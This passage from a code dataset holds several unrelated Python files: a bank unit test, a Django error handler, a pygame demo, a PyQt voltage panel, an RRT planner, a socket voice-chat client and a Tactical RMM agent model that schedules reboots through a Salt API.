cv2.destroyAllWindows()\n    print(statusList)\n\n\nsurveillance()\n","sub_path":"objectDetector.py","file_name":"objectDetector.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"366568281","text":"from ddt import ddt\r\nfrom ddt import unpack\r\nfrom ddt import data\r\nfrom Bank import bank_addUser\r\nfrom unittest import TestCase\r\n\r\n\r\n# username, password, country, province, street, door, money\r\nda=[\r\n    [\"二狗子\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 1],\r\n    [\"二狗子\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 2],\r\n    [\"二狗子s\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 1],\r\n]\r\n@ddt\r\nclass TestBank1(TestCase):\r\n    for i in range(96):\r\n        name = \"二狗子\" + str(i)\r\n        da.append([name,123456,\"中国\", \"北京\", \"沙阳路\", \"s001\", 5000,1])\r\n    da.append([\"二狗子dd\",123456,\"中国\", \"北京\", \"沙阳路\", \"s001\", 5000,3])\r\n\r\n    @data(*da)\r\n    @unpack\r\n    def testAddUser(self,a,b,c,d,e,f,g,h):\r\n\r\n        s = bank_addUser(a,b,c,d,e,f,g)\r\n        self.assertEqual(h,s)\r\n\r\n\r\n","sub_path":"testaddUser.py","file_name":"testaddUser.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"329438584","text":"import sys\nimport traceback\n\nfrom django.conf import settings\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom sentry_sdk import capture_exception\n\n\ndef custom_exception_handler(exc, context) -> Response:\n    \"\"\"\n    Handle API exceptions.\n\n    Produces response data with this structure:\n\n    {\n        \"message\" : \"Invalid input.\",\n        \"errors\" : [\n            {\n                \"field\" : \"name\",\n                \"message\" : \"This field is required.\"\n            }\n        ]\n    }\n\n    The \`message\` string is always present but the \`errors\` array may not.\n\n    Inspired by, but simpler than, https://github.com/FutureMind/drf-friendly-errors\n    which is currently unmaintained and not 
compatible with latest DRF.\n \"\"\"\n # Call rest_framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exc, context)\n\n if response is not None:\n # Restructure the standard error response\n # so it has a consistent shape\n data = {}\n\n message = getattr(exc, \"default_detail\", None)\n if \"detail\" in response.data:\n message = str(response.data[\"detail\"])\n del response.data[\"detail\"]\n data[\"message\"] = message\n\n errors = []\n items = (\n response.data.items()\n if isinstance(response.data, dict)\n else [(None, message) for message in response.data]\n )\n for key, value in items:\n message = (\n \". \".join([str(item) for item in value])\n if isinstance(value, list)\n else str(value)\n )\n error = {\"field\": key, \"message\": message}\n errors.append(error)\n\n if len(errors):\n data[\"errors\"] = errors\n\n # Always return JSON errors\n return Response(\n data, status=response.status_code, content_type=\"application/json\"\n )\n\n # rest_framework did not handle this exception so\n # generate a API response to prevent it from getting handled by the\n # default Django HTML-generating 500 handler\n data = {\"message\": str(exc)}\n stack = traceback.format_exc()\n sys.stderr.write(stack)\n if settings.DEBUG:\n data[\"traceback\"] = stack\n if hasattr(settings, \"SENTRY_DSN\") and settings.SENTRY_DSN:\n capture_exception(exc)\n return Response(data, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"manager/manager/api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244362889","text":"\"\"\"\nThis is ninth task from Python Course - Basic (Day 13 of the course)\nDone by DirtySiwy12\n\nTask 9.4.2: Create a Pong (ball).\n\"\"\"\n\nimport os\nimport time\nimport pygame.locals\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nDARK_BLUE = (0, 0, 128)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nPINK = (255, 200, 200)\nYELLOW = (255, 255, 0)\n\npygame.init()\n\nsize = width, height = 640, 480\nspeed_x, speed_y = 2, 2\n\nscreen = pygame.display.set_mode(size, 0, 32)\n\n# Take the ball from images, and make it an object\nball = pygame.image.load(os.path.join('../images', 'intro_ball.gif'))\nball_rect = ball.get_rect()\n\nloop_end = False\n\nwhile not loop_end:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n loop_end = True\n\n elif event.type == pygame.locals.KEYDOWN:\n if event.key == pygame.locals.K_q:\n loop_end = True\n break\n\n # Give ball movement\n ball_rect = ball_rect.move((speed_x, speed_y))\n\n # Give some simple physics\n if ball_rect.left < 0 or ball_rect.right > width:\n speed_x = -speed_x\n if ball_rect.top < 0 or ball_rect.bottom > height:\n speed_y = -speed_y\n\n # Take it to the screen\n screen.fill(BLACK)\n screen.blit(ball, ball_rect)\n pygame.display.update()\n time.sleep(.01)\n\npygame.quit()\n","sub_path":"Task_09_Games/Game_04_Pong/Pong_Ball.py","file_name":"Pong_Ball.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522592848","text":"import os\ntrainpath = 'test'\n\n\n# Get image list\ndef getImageList():\n imagelist = [os.path.join(parent, filename)\n if filename.lower().endswith((\n '.bmp', '.dib', '.png', '.jpg', '.jpeg', '.pbm',\n '.pgm', '.ppm', '.tif', '.tiff'))\n else None\n for parent, dirnames, filenames in 
os.walk(trainpath)\n                 for filename in filenames]\n    return [filename for filename in imagelist if filename is not None]\n\n\ndef argwrapper(args):\n    return args[0](*args[1:])\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"637217802","text":"from PyQt5.QtWidgets import QApplication,QWidget,QGridLayout,QLineEdit,QDoubleSpinBox,QPushButton,QMessageBox,QLabel\r\nfrom PyQt5 import QtCore,QtWidgets,QtGui\r\nimport sys\r\nimport os \r\n\r\nclass vol_panel(QWidget):\r\n\r\n    def __init__(self,parent=None):\r\n        super(vol_panel,self).__init__()\r\n        self.initUi()\r\n\r\n    def initUi(self):\r\n        init_vol1 = [5,1,-0.7,1,5]\r\n        init_vol2 = [5,1,-0.33,1,5]\r\n        layout = QGridLayout()\r\n        for i in range(5):\r\n            var1 = 'vol1'+str(i+1)\r\n            var2 = 'vol2'+str(i+1)\r\n\r\n            exec(var1+'=QDoubleSpinBox()')\r\n            exec(var2+'=QDoubleSpinBox()')\r\n\r\n            l11 = var1+'.setRange(-10,10)'\r\n            l21 = var2+'.setRange(-10,10)'\r\n\r\n            l12 = var1+'.setDecimals(2)'\r\n            l22 = var2+'.setDecimals(2)'\r\n\r\n            l13 = var1+'.setValue('+str(init_vol1[i])+')'\r\n            l23 = var2+'.setValue('+str(init_vol2[i])+')'\r\n\r\n            l14 = var1+'.setSingleStep(0.01)'\r\n            l24 = var2+'.setSingleStep(0.01)'\r\n\r\n            line1 = [l11,l12,l13,l14]\r\n            line2 = [l21,l22,l23,l24]\r\n\r\n            for k in range(4):\r\n                exec(line1[k])\r\n                exec(line2[k])\r\n            \r\n            add_code1 = 'layout.addWidget('+var1+',1,'+str(i+1)+')'\r\n            add_code2 = 'layout.addWidget('+var2+',2,'+str(i+1)+')'\r\n            eval(add_code1)\r\n            eval(add_code2)\r\n            #eval(add_code2)\r\n\r\n            \r\n            add_attr1 = 'self.'+var1+'='+var1\r\n            add_attr2 = 'self.'+var2+'='+var2\r\n            exec(add_attr1)\r\n            exec(add_attr2)\r\n\r\n        btn = QPushButton('Apply')\r\n        btn.clicked.connect(self.set_value)\r\n\r\n        layout.addWidget(btn,3,2)\r\n        l1 = QLabel('Left')\r\n        l2 = QLabel('Right')\r\n        layout.addWidget(l1,1,0)\r\n        layout.addWidget(l2,2,0)\r\n\r\n        self.setLayout(layout)\r\n        self.message = QMessageBox()\r\n\r\n    def set_value(self):\r\n        # print(self.vol11)\r\n        vol1 = [0]*5\r\n        vol2 = [0]*5\r\n        for k in range(2):\r\n            for i in range(5):\r\n                code = 'vol'+str(k+1)+'['+str(i)+']=self.vol'+str(k+1)+str(i+1)+'.value()'\r\n                exec(code)\r\n        vol = vol1+vol2\r\n        new_vol = 'vol = '+str(vol)\r\n        \r\n        #self.message.setText('Apply this voltage setting?')\r\n        #self.message.exec_()\r\n        f=open('vol-template.py','r')\r\n        con = f.read()\r\n        con1 = con.replace('vol = [5.0,1.,-0.75,1.,5.0]+[5.,1.,-0.35,1.,5.]',new_vol)\r\n        f.close()\r\n        f = open('set_voltage.py','w')\r\n        f.write(con1)\r\n        f.close()\r\n\r\n        os.system('set_voltage.bat')\r\nif __name__ == \"__main__\":\r\n    app = QApplication(sys.argv)\r\n    ex = vol_panel()\r\n    ex.show()\r\n    sys.exit(app.exec_())","sub_path":"Voltage/vol-panel.py","file_name":"vol-panel.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"509960656","text":"#!/usr/bin/env python2\n\nfrom rrt_node import RRTNode, raytrace\nfrom sensor import Sensor\nfrom rtree import index\nimport random\nimport numpy as np\nfrom sklearn import preprocessing\nfrom math import log\n\n\nclass RRT:\n    def __init__(self, root_position, bbx_min, bbx_max, radius, extension_range):\n        self._bbx_min = bbx_min\n        self._bbx_max = bbx_max\n        self._radius = radius\n        self._extension_range = extension_range\n\n        # Create r-tree\n        p = index.Property()\n        p.dimension = 2\n        self._tree = index.Index(properties=p)\n\n        self._id = 0\n        self._root = 
self.create_new_node(root_position)\n        self.insert(self._root, None)\n\n    def sample(self):\n        position = np.array([[0, 0]], dtype=np.float)\n        for i in range(0, len(position[0])):\n            position[0][i] = random.uniform(self._bbx_min[i], self._bbx_max[i])\n        return self.create_new_node(position)\n\n    def create_new_node(self, position):\n        node = RRTNode(self._id, position)\n        self._id += 1\n        return node\n\n    def expand_tree(self, grid_map, sensor, l):\n        new_node = self.sample()\n\n        return self.extend(grid_map, sensor, l, new_node)\n\n    def extend(self, grid_map, sensor, l, new_node):\n        closest_node = self.get_closest(new_node)\n        new_node = self.restrict_distance(new_node, closest_node)\n\n        if self.valid_node(grid_map, new_node, closest_node):\n            near_nodes = self.get_near(new_node)\n            if closest_node in near_nodes:\n                near_nodes.remove(closest_node)\n            parent = self.choose_parent(\n                grid_map, sensor, l, near_nodes, closest_node, new_node)\n            if parent in near_nodes:\n                near_nodes.remove(parent)\n            self.insert(new_node, parent)\n            self.rewire(grid_map, sensor, l, near_nodes, new_node)\n            return new_node\n\n        return None\n\n    def choose_parent(self, grid_map, sensor, l, near_nodes, closest_node, new_node):\n        max_score = new_node.score_with_parent(\n            closest_node, grid_map, sensor, l)\n        best_parent = closest_node\n        for node in near_nodes:\n            if self.valid_node(grid_map, new_node, node):\n                new_score = new_node.score_with_parent(\n                    node, grid_map, sensor, l)\n                if max_score < new_score:\n                    max_score = new_score\n                    best_parent = node\n        return best_parent\n\n    def rewire(self, grid_map, sensor, l, near_nodes, new_node):\n        for node in near_nodes:\n            if self.valid_node(grid_map, node, new_node):\n                if node.score(grid_map, sensor, l) < node.score_with_parent(new_node, grid_map, sensor, l):\n                    self.update(node, new_node)\n\n    def valid_node(self, grid_map, node, parent):\n        node_position = node.get_position()\n        node_map_coord = [(node_position[0][0] - grid_map.info.origin.position.x) / grid_map.info.resolution,\n                          (node_position[0][1] - grid_map.info.origin.position.y) / grid_map.info.resolution]\n\n        parent_position = parent.get_position()\n        parent_map_coord = [(parent_position[0][0] - grid_map.info.origin.position.x) / grid_map.info.resolution,\n                            (parent_position[0][1] - grid_map.info.origin.position.y) / grid_map.info.resolution]\n\n        start = np.array([parent_map_coord], dtype=np.float)\n        end = np.array([node_map_coord], dtype=np.float)\n        # radius_in_grid = (self._radius / grid_map.info.resolution) + 3\n\n        t = raytrace((start[0][0], start[0][1]), (end[0][0], end[0][1]))\n        if 1 < len(t):\n            for (t_x, t_y) in t[1:]:\n                if 0 != grid_map.data[t_y * grid_map.info.width + t_x]:\n                    return False\n\n        # Check last node\n        if 0 != grid_map.data[int(end[0][1]) * grid_map.info.width + int(end[0][0])]:\n            return False\n\n        return True\n\n    def distance_to_line_segment(self, start, end, point):\n        length = np.linalg.norm(end - start)\n\n        if 0 == length:\n            return np.linalg.norm(start - point)\n\n        t = max(0, min(1, np.dot(np.reshape(point - start, 2),\n                                 np.reshape(end - start, 2)) / (length ** 2)))\n        projection = start + (t * (end - start))\n\n        return np.linalg.norm(point - projection)\n\n    def insert(self, node, parent):\n        self.update(node, parent)\n        position = node.get_position()\n        self._tree.insert(\n            node.get_id(), (position[0][0], position[0][1]), obj=node)\n\n    def update(self, node, new_parent):\n        node.set_parent(new_parent)\n\n    def erase(self, node):\n        if node.has_children():\n            pass  # TODO: Throw error\n\n        node.set_parent(None)\n        # 
Remove from tree\n position = node.get_position()\n self._tree.delete(\n node.node_id, (position[0][0], position[0][1]))\n\n def get_closest(self, node):\n # Get the closest node\n position = node.get_position()\n hits = list(self._tree.nearest(\n (position[0][0], position[0][1]), 1, objects=True))\n assert(1 <= len(hits))\n return hits[0].object\n\n def get_near(self, node):\n # Get nodes that are nearby\n position = node.get_position()\n bbx = (position[0][0] - self._extension_range, position[0][1] - self._extension_range,\n position[0][0] + self._extension_range, position[0][1] + self._extension_range)\n hits = self._tree.intersection(bbx, objects=True)\n nodes = []\n for hit in hits:\n nodes.append(hit.object)\n return nodes\n\n def restrict_distance(self, node, closest_node):\n origin = closest_node.get_position()\n direction = node.get_position() - origin\n\n if np.linalg.norm(direction) > self._extension_range:\n direction = self._extension_range * \\\n preprocessing.normalize(direction, norm=\"l2\")\n node.set_position(origin + direction)\n\n return node\n\n def get_nodes(self, grid_map):\n bbx = (grid_map.info.origin.position.x, grid_map.info.origin.position.y, grid_map.info.origin.position.x + (grid_map.info.width *\n grid_map.info.resolution), grid_map.info.origin.position.y + (grid_map.info.height * grid_map.info.resolution))\n hits = self._tree.intersection(bbx, objects=True)\n nodes = []\n for hit in hits:\n nodes.append(hit.object)\n return nodes\n","sub_path":"scripts/rrt.py","file_name":"rrt.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269908039","text":"# this file is only for testing the server. In case of java server add \\n to message before sending\n\nimport socket\nimport pyaudio\nfrom time import sleep\nfrom threading import Thread;\n\nHOST, PORT, BUFFER = \"\", 5000, 10\n\n\n# voice chat is second thread in client\n# when user clicks on join audio button create this object and call .start() method\nclass Voice_chat(Thread):\n\n\tdef __init__(self,req_list):\n\t\tThread.__init__(self)\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\t\tself.meeting_key = req_list[2]\n\t\tself.meeting_val = req_list[3]\n\t\tself.username = req_list[1]\n\t\tself.init_req = \"audio:\" + self.username + \":\" + self.meeting_key + \":\" + self.meeting_val\n\t\tself.audio_player = pyaudio.PyAudio()\n\t\tself.playing_stream = self.audio_player.open(format=pyaudio.paInt16, channels=1, rate=20000, output=True, frames_per_buffer=1024)\n\t\tself.recording_stream = self.audio_player.open(format=pyaudio.paInt16, channels=1, rate=20000, input=True, frames_per_buffer=1024)\n\t\tself.kill_thread = False\n\n\tdef receive_audio(self):\n\t\twhile not self.kill_thread:\n\t\t\ttry:\n\t\t\t\tdata = self.sock.recv(1024)\n\t\t\t\tself.playing_stream.write(data)\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\n\tdef send_audio(self):\n\t\twhile not self.kill_thread:\n\t\t\ttry:\n\t\t\t\tdata = self.recording_stream.read(1024)\n\t\t\t\tself.sock.send(data)\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.sock.connect((HOST, PORT))\n\t\texcept Exception as e:\n\t\t\treturn\n\t\t\n\t\tprint(\"[AUDIO:SUCCESS]![connected to server]\")\n\n\t\ttry:\n\t\t\tself.sock.send(Client.get_length(self.init_req).encode('utf8'))\n\t\t\tself.sock.send(self.init_req.encode('utf8'))\n\t\texcept Exception as 
e:\n\t\t\tprint(e)\n\t\t\treturn\n\t\t\n\t\tprint(\"[AUDIO:SUCCESS]![request send to server]\")\n\n\t\ttry:\n\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\tmessage = self.sock.recv(length).decode('utf8') \n\t\texcept Exception as e:\n\t\t\treturn\n\n\t\tprint(message)\n\t\tif \"1\" in message:\n\t\t\tthread = Thread(target = self.send_audio).start()\n\t\t\tself.receive_audio()\n\t\telse:\n\t\t\tprint(\"[AUDIO:CLIENT]![Incorrect creadentials]\")\n\n\n# Client is main thread\n# when user clicks join/create meeting create this object\n# for now \"audio\" is handled by this class audio not working\nclass Client:\n\n\tdef __init__(self):\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tself.sock.connect((HOST, PORT))\n\t\texcept Exception as e:\n\t\t\tprint(\"[CONNECT:SERVER]![connection refused by server]\")\n\t\telse:\n\t\t\tself.request = input()\n\t\t\tself.init_req = self.request.split(\":\")\n\t\t\ttry:\n\t\t\t\tself.sock.send((self.get_length(self.request)).encode('utf8'))\n\t\t\t\tself.sock.send(self.request.encode('utf8'))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![connection pipeline broken] : \" , e)\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\t\t\tself.response = self.sock.recv(length).decode('utf8')\n\t\t\t\t\tprint(self.response)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"[RECEIVE:SERVER]![connection pipeline broken]\")\n\t\t\t\telse:\n\t\t\t\t\tif \"1\" in self.response:\n\t\t\t\t\t\tif self.init_req[0] == \"audio\":\n\t\t\t\t\t\t\tvoice_chat = Voice_chat(self.init_req)\n\t\t\t\t\t\t\tvoice_chat.start()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tthread = Thread(target = self.send_text, args = ()).start()\n\t\t\t\t\t\t\tself.recv_text()\n\n\t@staticmethod\n\tdef get_length(message):\n\t\tlength = str(len(message));\n\t\tlength += \" \"*(BUFFER - len(length))\n\t\treturn length\n\n\tdef send_text(self):\n\t\twhile 1:\n\t\t\tmessage = input(\"Enter message : \")\n\t\t\tif message == \"exit\":\n\t\t\t\tself.sock.close()\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tself.sock.send(self.get_length(message).encode('utf8'))\n\t\t\t\tself.sock.send(message.encode('utf8'))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![can't send to server]\")\n\n\tdef recv_text(self):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\t\tmessage = self.sock.recv(length).decode('utf8')\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![can't recv from server]\")\n\t\t\telse:\n\t\t\t\tprint(message)\n\nclient = Client()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"278862963","text":"import requests\nimport datetime as dt\nimport time\nimport hashlib\nimport secrets\nimport base64\nfrom Crypto.Cipher import AES\nfrom binascii import unhexlify\nimport validators\nimport random\nimport string\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.contrib.postgres.fields import JSONField\n\nfrom core.models import TZ_CHOICES\n\nimport automation\n\n\nclass Agent(models.Model):\n version = models.CharField(default=\"0.1.0\", max_length=255)\n operating_system = models.CharField(null=True, max_length=255)\n plat = models.CharField(max_length=255, null=True)\n plat_release = models.CharField(max_length=255, null=True)\n hostname = models.CharField(max_length=255)\n 
local_ip = models.TextField(null=True)\n agent_id = models.CharField(max_length=200)\n last_seen = models.DateTimeField(null=True, blank=True)\n services = JSONField(null=True)\n public_ip = models.CharField(null=True, max_length=255)\n total_ram = models.IntegerField(null=True)\n used_ram = models.IntegerField(null=True)\n disks = JSONField(null=True)\n boot_time = models.FloatField(null=True)\n logged_in_username = models.CharField(null=True, max_length=200)\n client = models.CharField(max_length=200)\n antivirus = models.CharField(default=\"n/a\", max_length=255)\n site = models.CharField(max_length=150)\n monitoring_type = models.CharField(max_length=30)\n description = models.CharField(null=True, max_length=255)\n mesh_node_id = models.CharField(null=True, max_length=255)\n overdue_email_alert = models.BooleanField(default=False)\n overdue_text_alert = models.BooleanField(default=False)\n overdue_time = models.PositiveIntegerField(default=30)\n check_interval = models.PositiveIntegerField(default=120)\n needs_reboot = models.BooleanField(default=False)\n managed_by_wsus = models.BooleanField(default=False)\n is_updating = models.BooleanField(default=False)\n choco_installed = models.BooleanField(default=False)\n wmi_detail = JSONField(null=True)\n time_zone = models.CharField(\n max_length=255, choices=TZ_CHOICES, null=True, blank=True\n )\n policy = models.ForeignKey(\n \"automation.Policy\",\n related_name=\"agents\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n\n def __str__(self):\n return self.hostname\n\n @property\n def timezone(self):\n # return the default timezone unless the timezone is explicity set per agent\n if self.time_zone is not None:\n return self.time_zone\n else:\n from core.models import CoreSettings\n\n return CoreSettings.objects.first().default_time_zone\n\n @property\n def status(self):\n offline = dt.datetime.now(dt.timezone.utc) - dt.timedelta(minutes=4)\n overdue = dt.datetime.now(dt.timezone.utc) - dt.timedelta(\n minutes=self.overdue_time\n )\n\n if self.last_seen is not None:\n if (self.last_seen < offline) and (self.last_seen > overdue):\n return \"offline\"\n elif (self.last_seen < offline) and (self.last_seen < overdue):\n return \"overdue\"\n else:\n return \"online\"\n else:\n return \"offline\"\n\n @property\n def has_patches_pending(self):\n\n if self.winupdates.filter(action=\"approve\").exists():\n return True\n else:\n return False\n\n @property\n def salt_id(self):\n return f\"{self.hostname}-{self.pk}\"\n\n @property\n def checks(self):\n total, passing, failing = 0, 0, 0\n\n if self.agentchecks.exists():\n for i in self.agentchecks.all():\n total += 1\n if i.status == \"passing\":\n passing += 1\n elif i.status == \"failing\":\n failing += 1\n\n has_failing_checks = True if failing > 0 else False\n\n ret = {\n \"total\": total,\n \"passing\": passing,\n \"failing\": failing,\n \"has_failing_checks\": has_failing_checks,\n }\n return ret\n\n @property\n def cpu_model(self):\n try:\n cpu = self.wmi_detail[\"cpu\"][0]\n return [x[\"Name\"] for x in cpu if \"Name\" in x][0]\n except:\n return \"unknown cpu model\"\n\n @property\n def local_ips(self):\n try:\n ips = self.wmi_detail[\"network_config\"]\n ret = []\n for _ in ips:\n try:\n addr = [x[\"IPAddress\"] for x in _ if \"IPAddress\" in x][0]\n except:\n continue\n else:\n for ip in addr:\n if validators.ipv4(ip):\n ret.append(ip)\n\n if len(ret) == 1:\n return ret[0]\n else:\n return \", \".join(ret)\n except:\n return \"error getting local ips\"\n\n @property\n def 
make_model(self):\n try:\n comp_sys = self.wmi_detail[\"comp_sys\"][0]\n comp_sys_prod = self.wmi_detail[\"comp_sys_prod\"][0]\n make = [x[\"Vendor\"] for x in comp_sys_prod if \"Vendor\" in x][0]\n model = [x[\"SystemFamily\"] for x in comp_sys if \"SystemFamily\" in x][0]\n if not make or not model:\n return [x[\"Version\"] for x in comp_sys_prod if \"Version\" in x][0]\n else:\n return f\"{make} {model}\"\n except:\n return \"unknown make/model\"\n\n @property\n def physical_disks(self):\n try:\n disks = self.wmi_detail[\"disk\"]\n phys = []\n for disk in disks:\n model = [x[\"Caption\"] for x in disk if \"Caption\" in x][0]\n size = [x[\"Size\"] for x in disk if \"Size\" in x][0]\n interface_type = [\n x[\"InterfaceType\"] for x in disk if \"InterfaceType\" in x\n ][0]\n phys.append(\n {\n \"model\": model,\n \"size\": round(int(size) / 1_073_741_824), # bytes to GB\n \"interfaceType\": interface_type,\n }\n )\n\n return phys\n except:\n return [{\"model\": \"unknown\", \"size\": \"unknown\", \"interfaceType\": \"unknown\"}]\n\n def generate_checks_from_policies(self):\n # Clear agent checks managed by policy\n self.agentchecks.filter(managed_by_policy=True).delete()\n\n # Clear agent checks that have overriden_by_policy set\n self.agentchecks.update(overriden_by_policy=False)\n\n # Generate checks based on policies\n automation.models.Policy.generate_policy_checks(self)\n\n # https://github.com/Ylianst/MeshCentral/issues/59#issuecomment-521965347\n def get_login_token(self, key, user, action=3):\n key = bytes.fromhex(key)\n key1 = key[0:48]\n key2 = key[48:]\n msg = '{{\"a\":{}, \"u\":\"{}\",\"time\":{}}}'.format(action, user, int(time.time()))\n iv = secrets.token_bytes(16)\n\n # sha\n h = hashlib.sha3_384()\n h.update(key1)\n msg = h.digest() + msg.encode()\n\n # aes\n a = AES.new(key2, AES.MODE_CBC, iv)\n n = 16 - (len(msg) % 16)\n n = 16 if n == 0 else n\n pad = unhexlify(\"%02x\" % n)\n msg = a.encrypt(msg + pad * n)\n\n return base64.b64encode(iv + msg, altchars=b\"@$\").decode(\"utf-8\")\n\n @staticmethod\n def salt_api_cmd(**kwargs):\n try:\n salt_timeout = kwargs[\"salt_timeout\"]\n except KeyError:\n salt_timeout = 60\n json = {\n \"client\": \"local\",\n \"tgt\": kwargs[\"hostname\"],\n \"fun\": kwargs[\"func\"],\n \"timeout\": salt_timeout,\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n }\n\n if \"arg\" in kwargs:\n json.update({\"arg\": kwargs[\"arg\"]})\n if \"kwargs\" in kwargs:\n json.update({\"kwarg\": kwargs[\"kwargs\"]})\n resp = requests.post(\n \"http://\" + settings.SALT_HOST + \":8123/run\",\n json=[json],\n timeout=kwargs[\"timeout\"],\n )\n return resp\n\n @staticmethod\n def salt_api_async(**kwargs):\n\n json = {\n \"client\": \"local_async\",\n \"tgt\": kwargs[\"hostname\"],\n \"fun\": kwargs[\"func\"],\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n }\n\n if \"arg\" in kwargs:\n json.update({\"arg\": kwargs[\"arg\"]})\n if \"kwargs\" in kwargs:\n json.update({\"kwarg\": kwargs[\"kwargs\"]})\n resp = requests.post(\"http://\" + settings.SALT_HOST + \":8123/run\", json=[json])\n return resp\n\n @staticmethod\n def salt_api_job(jid):\n\n session = requests.Session()\n session.post(\n \"http://\" + settings.SALT_HOST + \":8123/login\",\n json={\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n },\n )\n\n return session.get(f\"http://{settings.SALT_HOST}:8123/jobs/{jid}\")\n\n @staticmethod\n def 
get_github_versions():\n r = requests.get(\"https://api.github.com/repos/wh1te909/winagent/releases\")\n versions = {}\n for i, release in enumerate(r.json()):\n versions[i] = release[\"name\"]\n\n return {\"versions\": versions, \"data\": r.json()}\n\n def schedule_reboot(self, obj):\n\n start_date = dt.datetime.strftime(obj, \"%Y-%m-%d\")\n start_time = dt.datetime.strftime(obj, \"%H:%M\")\n\n # let windows task scheduler automatically delete the task after it runs\n end_obj = obj + dt.timedelta(minutes=15)\n end_date = dt.datetime.strftime(end_obj, \"%Y-%m-%d\")\n end_time = dt.datetime.strftime(end_obj, \"%H:%M\")\n\n task_name = \"TacticalRMM_SchedReboot_\" + \"\".join(\n random.choice(string.ascii_letters) for _ in range(10)\n )\n\n try:\n r = self.salt_api_cmd(\n hostname=self.salt_id,\n timeout=20,\n func=\"task.create_task\",\n arg=[\n f\"name={task_name}\",\n \"force=True\",\n \"action_type=Execute\",\n 'cmd=\"C:\\\\Windows\\\\System32\\\\shutdown.exe\"',\n 'arguments=\"/r /t 5 /f\"',\n \"trigger_type=Once\",\n f'start_date=\"{start_date}\"',\n f'start_time=\"{start_time}\"',\n f'end_date=\"{end_date}\"',\n f'end_time=\"{end_time}\"',\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n \"delete_after=Immediately\",\n ],\n )\n except Exception:\n return {\"ret\": False, \"msg\": \"Unable to contact the agent\"}\n\n salt_resp = r.json()[\"return\"][0][self.salt_id]\n\n if isinstance(salt_resp, bool) and salt_resp == True:\n from logs.models import PendingAction\n\n details = {\n \"taskname\": task_name,\n \"time\": str(obj),\n }\n PendingAction(agent=self, action_type=\"schedreboot\", details=details).save()\n\n nice_time = dt.datetime.strftime(obj, \"%B %d, %Y at %I:%M %p\")\n return {\n \"ret\": True,\n \"msg\": {\"time\": nice_time, \"agent\": self.hostname},\n \"success\": True,\n }\n\n elif isinstance(salt_resp, bool) and salt_resp == False:\n return {\n \"ret\": True,\n \"msg\": \"Unable to create task (possibly because date/time cannot be in the past)\",\n \"success\": False,\n }\n\n else:\n return {\"ret\": True, \"msg\": salt_resp, \"success\": False}\n\n\nclass AgentOutage(models.Model):\n agent = models.ForeignKey(\n Agent,\n related_name=\"agentoutages\",\n null=True,\n blank=True,\n on_delete=models.CASCADE,\n )\n outage_time = models.DateTimeField(auto_now_add=True)\n recovery_time = models.DateTimeField(null=True, blank=True)\n outage_email_sent = models.BooleanField(default=False)\n outage_sms_sent = models.BooleanField(default=False)\n recovery_email_sent = models.BooleanField(default=False)\n recovery_sms_sent = models.BooleanField(default=False)\n\n @property\n def is_active(self):\n return False if self.recovery_time else True\n\n def send_outage_email(self):\n from core.models import CoreSettings\n\n CORE = CoreSettings.objects.first()\n CORE.send_mail(\n f\"{self.agent.client}, {self.agent.site}, {self.agent.hostname} - data overdue\",\n (\n f\"Data has not been received from client {self.agent.client}, \"\n f\"site {self.agent.site}, \"\n f\"agent 